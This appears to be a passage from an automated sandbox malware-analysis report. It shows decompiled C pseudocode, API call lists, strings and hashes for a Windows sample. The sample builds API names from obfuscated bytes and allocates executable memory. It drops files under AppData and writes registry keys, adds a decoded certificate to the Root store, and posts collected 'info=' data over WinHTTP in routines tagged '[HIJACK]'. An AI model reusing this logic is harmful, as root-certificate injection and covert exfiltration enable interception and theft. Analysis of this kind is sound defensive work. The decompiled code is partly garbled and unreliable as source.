                                                                                                                                                                  						_v31 = 0x69;
                                                                                                                                                                  						_v30 = 0x6c;
                                                                                                                                                                  						_v29 = 0x65;
                                                                                                                                                                  						_v28 = 0;
                                                                                                                                                                  						_v328 = 0x43;
                                                                                                                                                                  						_v327 = 0x6c;
                                                                                                                                                                  						_v326 = 0x6f;
                                                                                                                                                                  						_v325 = 0x73;
                                                                                                                                                                  						_v324 = 0x65;
                                                                                                                                                                  						_v323 = 0x48;
                                                                                                                                                                  						_v322 = 0x61;
                                                                                                                                                                  						_v321 = 0x6e;
                                                                                                                                                                  						_v320 = 0x64;
                                                                                                                                                                  						_v319 = 0x6c;
                                                                                                                                                                  						_v318 = 0x65;
                                                                                                                                                                  						_v317 = 0;
                                                                                                                                                                  						_v348 = 0x47;
                                                                                                                                                                  						_v347 = 0x65;
                                                                                                                                                                  						_v346 = 0x74;
                                                                                                                                                                  						_v345 = 0x4c;
                                                                                                                                                                  						 *((intOrPtr*)(_t126 + _t123 * 8 - 0x7b)) =  *((intOrPtr*)(_t126 + _t123 * 8 - 0x7b)) - 1;
                                                                                                                                                                  						asm("lodsb");
                                                                                                                                                                  						asm("invalid");
                                                                                                                                                                  						goto ( *((intOrPtr*)(_t124 - 0x3a)));
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  			}

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00427847
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0042787E
                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 004278B7
                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 004278D0
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 0042790D
                                                                                                                                                                  • RtlExitUserProcess.NTDLL(00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 004279A8
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocFileVirtual$ChangeCloseCreateExitFindNotificationProcessReadUser
                                                                                                                                                                  • String ID: CloseHandle$CreateFileA$ExitProcess$GetFileSize$GetLastError$GetModuleFileNameA$ReadFile$VirtualAlloc$VirtualProtect
                                                                                                                                                                  • API String ID: 4217122820-3199432782
                                                                                                                                                                  • Opcode ID: f8e91b6749a88eec4c67123bde6ff338c6db101b99990a9636a9dd143768a118
                                                                                                                                                                  • Instruction ID: 5d358df8297e2d17d1f90c08a807d3f05b33b7c0464408bf91c0e12edbe6f424
                                                                                                                                                                  • Opcode Fuzzy Hash: f8e91b6749a88eec4c67123bde6ff338c6db101b99990a9636a9dd143768a118
                                                                                                                                                                  • Instruction Fuzzy Hash: 3512BC70D082E8DAEB21CB64CC58BDEBFB56F16704F0440C9D54C6A282D7BA5B98CF65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                                                  			E1000E96E() {
                                                                                                                                                                  				int _t13;
                                                                                                                                                                  				long _t19;
                                                                                                                                                                  				signed int _t20;
                                                                                                                                                                  				signed int _t21;
                                                                                                                                                                  				signed int _t22;
                                                                                                                                                                  				signed int _t23;
                                                                                                                                                                  				signed int _t27;
                                                                                                                                                                  				signed int _t28;
                                                                                                                                                                  				signed int _t32;
                                                                                                                                                                  				signed int _t33;
                                                                                                                                                                  				void* _t37;
                                                                                                                                                                  				long _t39;
                                                                                                                                                                  				void* _t40;
                                                                                                                                                                  				signed int _t47;
                                                                                                                                                                  				struct _OSVERSIONINFOA* _t49;
                                                                                                                                                                  				void* _t51;
                                                                                                                                                                  
                                                                                                                                                                  				_t37 = GetProcessHeap;
                                                                                                                                                                  				_t49 = HeapAlloc(GetProcessHeap(), 0, 0x94);
                                                                                                                                                                  				if(_t49 != 0) {
                                                                                                                                                                  					_t49->dwOSVersionInfoSize = 0x94;
                                                                                                                                                                  					_t13 = GetVersionExA(_t49);
                                                                                                                                                                  					__eflags = _t13;
                                                                                                                                                                  					_push(_t49);
                                                                                                                                                                  					_push(0);
                                                                                                                                                                  					if(_t13 != 0) {
                                                                                                                                                                  						 *(_t51 + 0xc) = _t49->dwPlatformId;
                                                                                                                                                                  						 *(_t51 + 0x10) = _t49->dwMajorVersion;
                                                                                                                                                                  						 *(_t51 - 4) = _t49->dwMinorVersion;
                                                                                                                                                                  						_t47 = _t49->dwBuildNumber & 0x00007fff;
                                                                                                                                                                  						HeapFree(GetProcessHeap(), ??, ??);
                                                                                                                                                                  						_t19 =  *(_t51 + 0xc);
                                                                                                                                                                  						__eflags = _t19 - 2;
                                                                                                                                                                  						if(_t19 != 2) {
                                                                                                                                                                  							_t47 = _t47 | 0x00008000;
                                                                                                                                                                  							__eflags = _t47;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t39 =  *(_t51 - 4);
                                                                                                                                                                  						 *0x1033548c = _t19;
                                                                                                                                                                  						_t20 =  *(_t51 + 0x10);
                                                                                                                                                                  						_t44 = (_t20 << 8) + _t39;
                                                                                                                                                                  						 *0x10335494 = (_t20 << 8) + _t39;
                                                                                                                                                                  						 *0x10335498 = _t20;
                                                                                                                                                                  						 *0x1033549c = _t39;
                                                                                                                                                                  						 *0x10335490 = _t47;
                                                                                                                                                                  						_t21 = E1000F81F(1);
                                                                                                                                                                  						__eflags = _t21;
                                                                                                                                                                  						_pop(_t40);
                                                                                                                                                                  						if(_t21 == 0) {
                                                                                                                                                                  							goto L1;
                                                                                                                                                                  						} else {
                                                                                                                                                                  							_t23 = E10011936(_t37);
                                                                                                                                                                  							__eflags = _t23;
                                                                                                                                                                  							if(_t23 != 0) {
                                                                                                                                                                  								E100150E1();
                                                                                                                                                                  								 *0x10338f64 = GetCommandLineA();
                                                                                                                                                                  								 *0x103352fc = E10014FAC(); // executed
                                                                                                                                                                  								_t27 = E100149F4(_t37, _t44, _t47, _t49, __eflags); // executed
                                                                                                                                                                  								__eflags = _t27;
                                                                                                                                                                  								if(_t27 >= 0) {
                                                                                                                                                                  									_t28 = E10014EF3(_t40);
                                                                                                                                                                  									__eflags = _t28;
                                                                                                                                                                  									if(_t28 < 0) {
                                                                                                                                                                  										L15:
                                                                                                                                                                  										E10014C34();
                                                                                                                                                                  										goto L10;
                                                                                                                                                                  									} else {
                                                                                                                                                                  										_t32 = E10014C80(_t40, _t44);
                                                                                                                                                                  										__eflags = _t32;
                                                                                                                                                                  										if(_t32 < 0) {
                                                                                                                                                                  											goto L15;
                                                                                                                                                                  										} else {
                                                                                                                                                                  											_t33 = E10011BD6(_t37, _t47, _t49, _t51, 0);
                                                                                                                                                                  											__eflags = _t33;
                                                                                                                                                                  											if(_t33 != 0) {
                                                                                                                                                                  												goto L15;
                                                                                                                                                                  											} else {
                                                                                                                                                                  												 *0x103352f8 =  *0x103352f8 + 1;
                                                                                                                                                                  												_t22 = 1;
                                                                                                                                                                  												__eflags = 1;
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								} else {
                                                                                                                                                                  									L10:
                                                                                                                                                                  									E10011620();
                                                                                                                                                                  									goto L8;
                                                                                                                                                                  								}
                                                                                                                                                                  							} else {
                                                                                                                                                                  								L8:
                                                                                                                                                                  								E1000F879();
                                                                                                                                                                  								goto L1;
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					} else {
                                                                                                                                                                  						HeapFree(GetProcessHeap(), ??, ??);
                                                                                                                                                                  						goto L1;
                                                                                                                                                                  					}
                                                                                                                                                                  				} else {
                                                                                                                                                                  					L1:
                                                                                                                                                                  					_t22 = 0;
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t22;
                                                                                                                                                                  			}



















                                                                                                                                                                  0x1000ea21
                                                                                                                                                                  0x1000ea1f
                                                                                                                                                                  0x1000e9a2
                                                                                                                                                                  0x1000e9a5
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1000e9a5
                                                                                                                                                                  0x1000e98b
                                                                                                                                                                  0x1000e98b
                                                                                                                                                                  0x1000e98b
                                                                                                                                                                  0x1000e98b
                                                                                                                                                                  0x1000eb31

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Heap$Process$Free$AllocCommandEnvironmentInitializeLineStringsVersion___crt__cinit__heap_term__ioinit__ioterm__mtterm__setargv__setenvp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2870529951-0
                                                                                                                                                                  • Opcode ID: fc94a89f3ef1200f27781975550bb89b68149c34957b6fa54f9fd08f5d5b4d7a
                                                                                                                                                                  • Instruction ID: 8b665d2d90db9d313c13c33d8a46f5d936d5b37bcfbd2c7c3b96e787307a2e84
                                                                                                                                                                  • Opcode Fuzzy Hash: fc94a89f3ef1200f27781975550bb89b68149c34957b6fa54f9fd08f5d5b4d7a
                                                                                                                                                                  • Instruction Fuzzy Hash: 4731C875A043518FF350DFB58DC161A37E8FF49381F228429E909DB256EB30EC818B51
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                  			E1001FA90(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                  				char _v267;
                                                                                                                                                                  				char _v268;
                                                                                                                                                                  				char _v531;
                                                                                                                                                                  				char _v532;
                                                                                                                                                                  				char _v536;
                                                                                                                                                                  				char _v803;
                                                                                                                                                                  				char _v804;
                                                                                                                                                                  				void* _t44;
                                                                                                                                                                  				void* _t46;
                                                                                                                                                                  				void* _t48;
                                                                                                                                                                  				void* _t50;
                                                                                                                                                                  				void* _t52;
                                                                                                                                                                  				void* _t54;
                                                                                                                                                                  				void* _t55;
                                                                                                                                                                  				void* _t57;
                                                                                                                                                                  				void* _t94;
                                                                                                                                                                  
                                                                                                                                                                  				_t94 = __eflags;
                                                                                                                                                                  				_t77 = __edi;
                                                                                                                                                                  				_v536 = 0;
                                                                                                                                                                  				_v532 = 0;
                                                                                                                                                                  				E1000CF80(__edi,  &_v531, 0, 0x103);
                                                                                                                                                                  				__imp__SHGetSpecialFolderPathA(0,  &_v532, 0x1a, 0); // executed
                                                                                                                                                                  				E1000CDB3( &_v532,  &_v532, 0x104, "\\Microsoft\\Windows\\win_a.dat");
                                                                                                                                                                  				_v804 = 0;
                                                                                                                                                                  				E1000CF80(_t77,  &_v803, 0, 0x103);
                                                                                                                                                                  				__imp__SHGetSpecialFolderPathA(0,  &_v804, 0x1a, 0);
                                                                                                                                                                  				E1000CDB3( &_v804,  &_v804, 0x104, "\\Microsoft\\Windows\\4b5ce2fe28308fd9");
                                                                                                                                                                  				_v268 = 0;
                                                                                                                                                                  				E1000CF80(_t77,  &_v267, 0, 0x103);
                                                                                                                                                                  				E1001F9F0(__ebx, _t77, __esi, _t94,  &_v268); // executed
                                                                                                                                                                  				_t44 = E1001F6E0(_a8, _t94, 0x80000002, "SOFTWARE\\Microsoft\\XAML_A", _a4, _a8); // executed
                                                                                                                                                                  				_t95 = _t44;
                                                                                                                                                                  				if(_t44 != 0) {
                                                                                                                                                                  					_t46 = E1001F6E0(_a4, _t95, 0x80000002, "SOFTWARE\\Microsoft\\XAML_B", _a4, _a8); // executed
                                                                                                                                                                  					_t96 = _t46;
                                                                                                                                                                  					if(_t46 != 0) {
                                                                                                                                                                  						_t48 = E1001F650( &_v532, _t96,  &_v532, _a4, _a8); // executed
                                                                                                                                                                  						_t97 = _t48;
                                                                                                                                                                  						if(_t48 != 0) {
                                                                                                                                                                  							_t50 = E1001F6E0( &_v532, _t97, 0x80000002, "SOFTWARE\\Microsoft\\a0b923820dcc509a", _a4, _a8); // executed
                                                                                                                                                                  							_t98 = _t50;
                                                                                                                                                                  							if(_t50 != 0) {
                                                                                                                                                                  								_t52 = E1001F6E0(_a8, _t98, 0x80000002, "SOFTWARE\\Microsoft\\9d4c2f636f067f89", _a4, _a8); // executed
                                                                                                                                                                  								_t99 = _t52;
                                                                                                                                                                  								if(_t52 != 0) {
                                                                                                                                                                  									_t54 = E1001F650(_a4, _t99,  &_v804, _a4, _a8); // executed
                                                                                                                                                                  									if(_t54 != 0) {
                                                                                                                                                                  										_t55 = E1001F780(__ebx, _t77, __esi, _a4, _a8); // executed
                                                                                                                                                                  										_t101 = _t55;
                                                                                                                                                                  										if(_t55 != 0) {
                                                                                                                                                                  											_t57 = E1001F6E0( &_v268, _t101, 0x80000002,  &_v268, _a4, _a8); // executed
                                                                                                                                                                  											if(_t57 != 0) {
                                                                                                                                                                  												_v536 = 1;
                                                                                                                                                                  											}
                                                                                                                                                                  										}
                                                                                                                                                                  									}
                                                                                                                                                                  								}
                                                                                                                                                                  							}
                                                                                                                                                                  						}
                                                                                                                                                                  					}
                                                                                                                                                                  				}
                                                                                                                                                                  				return _v536;
                                                                                                                                                                  			}




















                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FAB8
                                                                                                                                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FACD
                                                                                                                                                                  • _strcat_s.LIBCMT ref: 1001FAE4
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FB01
                                                                                                                                                                  • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000), ref: 1001FB16
                                                                                                                                                                  • _strcat_s.LIBCMT ref: 1001FB2D
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FB4A
                                                                                                                                                                    • Part of subcall function 1001F9F0: _memset.LIBCMT ref: 1001FA0E
                                                                                                                                                                    • Part of subcall function 1001F9F0: _strcat_s.LIBCMT ref: 1001FA41
                                                                                                                                                                    • Part of subcall function 1001F9F0: _sprintf.LIBCMT ref: 1001FA68
                                                                                                                                                                    • Part of subcall function 1001F780: CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F7BE
                                                                                                                                                                    • Part of subcall function 1001F780: CryptStringToBinaryA.CRYPT32(10026F28,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1001F803
                                                                                                                                                                    • Part of subcall function 1001F780: CertCreateCertificateContext.CRYPT32(00000001,00000000,00000000), ref: 1001F813
                                                                                                                                                                    • Part of subcall function 1001F780: CertOpenStore.CRYPT32(0000000A,00000000,00000000,00024000,Root), ref: 1001F842
                                                                                                                                                                    • Part of subcall function 1001F780: CertAddCertificateContextToStore.CRYPT32(00000000,00000000,00000001,00000000), ref: 1001F861
                                                                                                                                                                    • Part of subcall function 1001F780: CertCloseStore.CRYPT32(00000000,00000001), ref: 1001F9D2
                                                                                                                                                                    • Part of subcall function 1001F780: CertFreeCertificateContext.CRYPT32(00000000), ref: 1001F9DC
                                                                                                                                                                  Strings
                                                                                                                                                                  • SOFTWARE\Microsoft\a0b923820dcc509a, xrefs: 1001FBCC
                                                                                                                                                                  • \Microsoft\Windows\4b5ce2fe28308fd9, xrefs: 1001FB1C
                                                                                                                                                                  • SOFTWARE\Microsoft\XAML_A, xrefs: 1001FB69
                                                                                                                                                                  • \Microsoft\Windows\win_a.dat, xrefs: 1001FAD3
                                                                                                                                                                  • SOFTWARE\Microsoft\9d4c2f636f067f89, xrefs: 1001FBEA
                                                                                                                                                                  • SOFTWARE\Microsoft\XAML_B, xrefs: 1001FB8B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Cert$_memset$CertificateContextStore_strcat_s$BinaryCryptFolderPathSpecialString$CloseCreateFreeOpen_sprintf
                                                                                                                                                                  • String ID: SOFTWARE\Microsoft\9d4c2f636f067f89$SOFTWARE\Microsoft\XAML_A$SOFTWARE\Microsoft\XAML_B$SOFTWARE\Microsoft\a0b923820dcc509a$\Microsoft\Windows\4b5ce2fe28308fd9$\Microsoft\Windows\win_a.dat
                                                                                                                                                                  • API String ID: 475603772-4188859120
                                                                                                                                                                  • Opcode ID: 0a5fcaf454aad501ee2a671e7f0111277b416851bab7cb84d5da4d1715e2ef5c
                                                                                                                                                                  • Instruction ID: 4e31c407b2421ecadd55cccd68f5b7507d928531dec073e07e65c36de6934fcb
                                                                                                                                                                  • Opcode Fuzzy Hash: 0a5fcaf454aad501ee2a671e7f0111277b416851bab7cb84d5da4d1715e2ef5c
                                                                                                                                                                  • Instruction Fuzzy Hash: BF41577AA00108B7E704DAA0DC46FF9336CDB64344F404098FE1C9A182EB71EB848BA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                  			E10022D00(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				intOrPtr _v16;
                                                                                                                                                                  				char _v44;
                                                                                                                                                                  				char _v48;
                                                                                                                                                                  				char _v76;
                                                                                                                                                                  				char _v104;
                                                                                                                                                                  				char _v132;
                                                                                                                                                                  				intOrPtr _v136;
                                                                                                                                                                  				char _v164;
                                                                                                                                                                  				char _v192;
                                                                                                                                                                  				char _v220;
                                                                                                                                                                  				signed int _v224;
                                                                                                                                                                  				intOrPtr _v228;
                                                                                                                                                                  				intOrPtr _v232;
                                                                                                                                                                  				intOrPtr _v236;
                                                                                                                                                                  				intOrPtr _v240;
                                                                                                                                                                  				intOrPtr _v244;
                                                                                                                                                                  				intOrPtr _v248;
                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                  				char* _t75;
                                                                                                                                                                  				intOrPtr _t77;
                                                                                                                                                                  				void* _t109;
                                                                                                                                                                  				void* _t110;
                                                                                                                                                                  				void* _t113;
                                                                                                                                                                  				intOrPtr _t154;
                                                                                                                                                                  				intOrPtr _t157;
                                                                                                                                                                  				void* _t160;
                                                                                                                                                                  				void* _t164;
                                                                                                                                                                  
                                                                                                                                                                  				_t164 = __eflags;
                                                                                                                                                                  				_t156 = __esi;
                                                                                                                                                                  				_t155 = __edi;
                                                                                                                                                                  				_t114 = __ebx;
                                                                                                                                                                  				_push(0xffffffff);
                                                                                                                                                                  				_push(E100232E0);
                                                                                                                                                                  				_push( *[fs:0x0]);
                                                                                                                                                                  				 *[fs:0x0] = _t157;
                                                                                                                                                                  				_v224 = 0;
                                                                                                                                                                  				_push(_a12);
                                                                                                                                                                  				_push(0x4c);
                                                                                                                                                                  				_push("post_info");
                                                                                                                                                                  				_t75 = PathFindFileNameA(".\\post_info.cpp"); // executed
                                                                                                                                                                  				E1001F230(__edi, "[HIJACK][%s][%s][%d]: data = %s\n", _t75); // executed
                                                                                                                                                                  				_v48 = 0;
                                                                                                                                                                  				_t77 = E10022530(__ebx, __edi, __esi, _t164, _a12);
                                                                                                                                                                  				_t160 = _t157 - 0xe8 + 0x18;
                                                                                                                                                                  				_v136 = _t77;
                                                                                                                                                                  				E10001160( &_v132, _t164, 0x10025ca2);
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				E10001160( &_v104, _t164, "info=");
                                                                                                                                                                  				_v8 = 1;
                                                                                                                                                                  				_v228 = E10001160( &_v164, _t164, _v136);
                                                                                                                                                                  				_v232 = _v228;
                                                                                                                                                                  				_v8 = 2;
                                                                                                                                                                  				E10001A90( &_v104, _v232);
                                                                                                                                                                  				_v8 = 1;
                                                                                                                                                                  				E100011A0( &_v164);
                                                                                                                                                                  				E10001160( &_v44, _t164, 0x10025ca3);
                                                                                                                                                                  				_v8 = 3;
                                                                                                                                                                  				E10001160( &_v76, _t164, 0x10025cb9);
                                                                                                                                                                  				_v8 = 4;
                                                                                                                                                                  				_v48 = 0;
                                                                                                                                                                  				while(1) {
                                                                                                                                                                  					_t165 = _v48 - 6;
                                                                                                                                                                  					if(_v48 > 6) {
                                                                                                                                                                  						break;
                                                                                                                                                                  					}
                                                                                                                                                                  					E100011C0( &_v132, 0x10025cba);
                                                                                                                                                                  					_v236 = E10022710(_t114, _t155, _t156, _t165,  &_v192, _v48);
                                                                                                                                                                  					_v240 = _v236;
                                                                                                                                                                  					_v8 = 5;
                                                                                                                                                                  					E10001A70( &_v132, _v240);
                                                                                                                                                                  					_v8 = 4;
                                                                                                                                                                  					E100011A0( &_v192);
                                                                                                                                                                  					_v244 = E10001160( &_v220, _t165, _a8);
                                                                                                                                                                  					_v248 = _v244;
                                                                                                                                                                  					_v8 = 6;
                                                                                                                                                                  					E10001A90( &_v132, _v248);
                                                                                                                                                                  					_v8 = 4;
                                                                                                                                                                  					E100011A0( &_v220);
                                                                                                                                                                  					_push(E100011E0( &_v132));
                                                                                                                                                                  					_push(0x61);
                                                                                                                                                                  					_push("post_info");
                                                                                                                                                                  					E1001F230(_t155, "[HIJACK][%s][%s][%d]: url = %s\n", PathFindFileNameA(".\\post_info.cpp")); // executed
                                                                                                                                                                  					E100011C0( &_v44, 0x10025cbb);
                                                                                                                                                                  					E100011C0( &_v76, 0x10025cce);
                                                                                                                                                                  					_t109 = E10001200( &_v104);
                                                                                                                                                                  					_t110 = E100011E0( &_v104);
                                                                                                                                                                  					E10021C30(_t114, _t155, _t156, _t165, 0, 0, 0, E100011E0( &_v132), 2, 1, 0, _t110, _t109, 0, 0, 0, 0, 0, 0,  &_v44,  &_v76); // executed
                                                                                                                                                                  					_t160 = _t160 + 0x60;
                                                                                                                                                                  					_t113 = E10001200( &_v44);
                                                                                                                                                                  					_t166 = _t113;
                                                                                                                                                                  					if(_t113 == 0) {
                                                                                                                                                                  						_t154 = _v48 + 1;
                                                                                                                                                                  						__eflags = _t154;
                                                                                                                                                                  						_v48 = _t154;
                                                                                                                                                                  						continue;
                                                                                                                                                                  					} else {
                                                                                                                                                                  					}
                                                                                                                                                                  					break;
                                                                                                                                                                  				}
                                                                                                                                                                  				_push(_v136);
                                                                                                                                                                  				E1000CA40(_t114, _t155, _t156, _t166);
                                                                                                                                                                  				E10001110(_a4, _t166,  &_v76);
                                                                                                                                                                  				_v224 = _v224 | 0x00000001;
                                                                                                                                                                  				_v8 = 3;
                                                                                                                                                                  				E100011A0( &_v76);
                                                                                                                                                                  				_v8 = 1;
                                                                                                                                                                  				E100011A0( &_v44);
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				E100011A0( &_v104);
                                                                                                                                                                  				_v8 = 0xffffffff;
                                                                                                                                                                  				E100011A0( &_v132);
                                                                                                                                                                  				 *[fs:0x0] = _v16;
                                                                                                                                                                  				return _a4;
                                                                                                                                                                  			}































                                                                                                                                                                  0x10022dee
                                                                                                                                                                  0x10022df2
                                                                                                                                                                  0x10022e04
                                                                                                                                                                  0x10022e04
                                                                                                                                                                  0x10022e08
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022e16
                                                                                                                                                                  0x10022e2e
                                                                                                                                                                  0x10022e3a
                                                                                                                                                                  0x10022e40
                                                                                                                                                                  0x10022e4e
                                                                                                                                                                  0x10022e53
                                                                                                                                                                  0x10022e5d
                                                                                                                                                                  0x10022e71
                                                                                                                                                                  0x10022e7d
                                                                                                                                                                  0x10022e83
                                                                                                                                                                  0x10022e91
                                                                                                                                                                  0x10022e96
                                                                                                                                                                  0x10022ea0
                                                                                                                                                                  0x10022ead
                                                                                                                                                                  0x10022eae
                                                                                                                                                                  0x10022eb0
                                                                                                                                                                  0x10022ec6
                                                                                                                                                                  0x10022ed6
                                                                                                                                                                  0x10022ee3
                                                                                                                                                                  0x10022eff
                                                                                                                                                                  0x10022f08
                                                                                                                                                                  0x10022f23
                                                                                                                                                                  0x10022f28
                                                                                                                                                                  0x10022f2e
                                                                                                                                                                  0x10022f33
                                                                                                                                                                  0x10022f35
                                                                                                                                                                  0x10022dfe
                                                                                                                                                                  0x10022dfe
                                                                                                                                                                  0x10022e01
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022f37
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x10022f35
                                                                                                                                                                  0x10022f44
                                                                                                                                                                  0x10022f45
                                                                                                                                                                  0x10022f54
                                                                                                                                                                  0x10022f62
                                                                                                                                                                  0x10022f68
                                                                                                                                                                  0x10022f6f
                                                                                                                                                                  0x10022f74
                                                                                                                                                                  0x10022f7b
                                                                                                                                                                  0x10022f80
                                                                                                                                                                  0x10022f87
                                                                                                                                                                  0x10022f8c
                                                                                                                                                                  0x10022f96
                                                                                                                                                                  0x10022fa1
                                                                                                                                                                  0x10022fab

                                                                                                                                                                  APIs
                                                                                                                                                                  • PathFindFileNameA.KERNELBASE(.\post_info.cpp,post_info,0000004C,?), ref: 10022D38
                                                                                                                                                                    • Part of subcall function 1001F230: _memset.LIBCMT ref: 1001F25B
                                                                                                                                                                    • Part of subcall function 1001F230: OutputDebugStringA.KERNEL32(?,?,?,?,?,10022D49,[HIJACK][%s][%s][%d]: data = %s), ref: 1001F293
                                                                                                                                                                    • Part of subcall function 10022530: _memset.LIBCMT ref: 10022584
                                                                                                                                                                    • Part of subcall function 10022530: _strlen.LIBCMT ref: 100225B8
                                                                                                                                                                    • Part of subcall function 10022530: _memset.LIBCMT ref: 10022626
                                                                                                                                                                    • Part of subcall function 10022530: _strlen.LIBCMT ref: 10022632
                                                                                                                                                                    • Part of subcall function 10022710: _memset.LIBCMT ref: 1002276B
                                                                                                                                                                    • Part of subcall function 10022710: GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 1002278C
                                                                                                                                                                  • PathFindFileNameA.SHLWAPI(.\post_info.cpp,post_info,00000061,00000000,?,?,?,info=,10025CA2), ref: 10022EBA
                                                                                                                                                                    • Part of subcall function 10021C30: WinHttpOpen.WINHTTP(A WinHTTP Example Program/1.0,00000000,00000000,00000000,00000000), ref: 10021D64
                                                                                                                                                                    • Part of subcall function 10021C30: WinHttpSetOption.WINHTTP(00000000,00000026,00000003,0000000C), ref: 10021DAC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$FileFindHttpNamePath_strlen$DebugLocalOpenOptionOutputStringTime
                                                                                                                                                                  • String ID: .\post_info.cpp$.\post_info.cpp$[HIJACK][%s][%s][%d]: data = %s$[HIJACK][%s][%s][%d]: url = %s$info=$post_info$post_info
                                                                                                                                                                  • API String ID: 2213638552-152146038
                                                                                                                                                                  • Opcode ID: 1568b6f6298a45623864e6ab8e00e2e8fe96cf20a69b2546b5d0c0ffb9461405
                                                                                                                                                                  • Instruction ID: 8607acd66d3c23fd638f037442e906d60192c638072a9ab774b96db5fff67154
                                                                                                                                                                  • Opcode Fuzzy Hash: 1568b6f6298a45623864e6ab8e00e2e8fe96cf20a69b2546b5d0c0ffb9461405
                                                                                                                                                                  • Instruction Fuzzy Hash: 57714E75D01248EBEB18DB94DD52BEEBB74EF18384F908098F60A77181EB712B45CB61
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 89%
